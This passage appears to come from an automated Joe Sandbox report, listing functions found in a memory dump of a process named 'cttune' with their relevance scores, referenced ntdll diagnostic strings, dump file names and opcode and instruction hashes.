                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 04FE4787
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04FE4742
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: 45e2bf0d3068971166b07e110b953b934d2d120f0443f1df798ebe9d33949330
                                        • Instruction ID: 41296ba58a9ca2a06d6f87305c1cc173fbd3e288706fed3511cc624edc8cc335
                                        • Opcode Fuzzy Hash: 45e2bf0d3068971166b07e110b953b934d2d120f0443f1df798ebe9d33949330
                                        • Instruction Fuzzy Hash: E951B771A00219ABEB21BFA5DC85FE977F8EF04304F140199E605A7291EB71FA578F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction ID: 657025391a22275400f72303f762756c44cd33024f819d92d8af90f2e934d627
                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction Fuzzy Hash: A381A270E052499EDF248E6AC8517FEBBA2AF47310F284659D8D1A7A90D734B843CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04F9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 04FE031E
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04FE02BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04FE02E7
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: 099ef5e77b313c5a54f16805d73dc46c26bc0e99f56624eaf507c77b5fb3e9ec
                                        • Instruction ID: 41c6b377e90af20af524710f2b1915a9996c3334bf60f2651a567c5c7a871ea9
                                        • Opcode Fuzzy Hash: 099ef5e77b313c5a54f16805d73dc46c26bc0e99f56624eaf507c77b5fb3e9ec
                                        • Instruction Fuzzy Hash: 02E1BF31A047419FEB25CF29C884B6AB7E0EB89314F140A5DF5A5CB2E1DB74F846CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 04FE7BAC
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04FE7B7F
                                        • RTL: Resource at %p, xrefs: 04FE7B8E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        • Opcode ID: f586407fa8ecfdf93f0fe6bcefd10b6a223b9eda8689756ed7d9a7b0798456c2
                                        • Instruction ID: 1db8f97ad2149ec06443cb6a5cf7c418d2d2b4ee0bff4d81612d42ca2c940df3
                                        • Opcode Fuzzy Hash: f586407fa8ecfdf93f0fe6bcefd10b6a223b9eda8689756ed7d9a7b0798456c2
                                        • Instruction Fuzzy Hash: 5441E0757007029FD720DE25DC40B6AB7E5EF88721F040A1DEA5ADB680EB71F8178B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04FE728C
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 04FE72C1
                                        • RTL: Resource at %p, xrefs: 04FE72A3
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04FE7294
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        • Opcode ID: e4f1da50ecb908e3c4fb875600362d4f6b7f81d846328a348a6ac30d6357ccca
                                        • Instruction ID: 09a16a2f982f753862474c42e88e6c05739b574fb84cb4b37091a94ca59373c6
                                        • Opcode Fuzzy Hash: e4f1da50ecb908e3c4fb875600362d4f6b7f81d846328a348a6ac30d6357ccca
                                        • Instruction Fuzzy Hash: 4241EF72B00202AFD720EE26CC41B6AB7E5FF84715F100619FE55AB280DB21F8139BE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05022300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        • Opcode ID: 48061616876dd085f034e2486aec2b36eaccf8d74e396cf5ecaa6c6b7aaabab4
                                        • Instruction ID: 8e4b5ceb5e0792109c53cfce6791a1049ecc8612f8d2ef00a15af66d0de39a43
                                        • Opcode Fuzzy Hash: 48061616876dd085f034e2486aec2b36eaccf8d74e396cf5ecaa6c6b7aaabab4
                                        • Instruction Fuzzy Hash: 4F318476A002299FDB60DE69DC40BEEB7F8FF44610F450555E849E3200EB30AA458BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction ID: f718b04a0e08b09629ed2c6287dc2453e41cf1bfa0ca15c9841376ff66c4f5f1
                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction Fuzzy Hash: 37917871E002159ADB24EE5BC8816FEB7E5AFC6750F14451AE8D5E72C0E730A94287E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04F79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280
                                        • Opcode ID: c29342baedaff7ee48118f7e46eb1c848632ebcb566aca83ca57086265ea45a9
                                        • Instruction ID: e8fd43ea5b252b3eb5d88cd41d2446275af0070732403a6433efdae0225dd3cf
                                        • Opcode Fuzzy Hash: c29342baedaff7ee48118f7e46eb1c848632ebcb566aca83ca57086265ea45a9
                                        • Instruction Fuzzy Hash: 1B812E71D002699BDB31DF54CC45BEEB6B4AF04754F0541EAE909B7240E7746E82CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 04FFCFBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: CallFilterFunc@8
                                        • String ID: @$@4Qw@4Qw
                                        • API String ID: 4062629308-2383119779
                                        • Opcode ID: 26c180bec225e48cda79205253a580ba9a15982fba0af60b2a98f88ed32f65ed
                                        • Instruction ID: 78c271e95b7e1e4e8f1df7a68d47f6303009b261bb03e96ebc14d5172ba2429f
                                        • Opcode Fuzzy Hash: 26c180bec225e48cda79205253a580ba9a15982fba0af60b2a98f88ed32f65ed
                                        • Instruction Fuzzy Hash: 04417072900258DFDB219F95DC40AADFBF8FF45B04F00442AEA05DB264D735A902DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%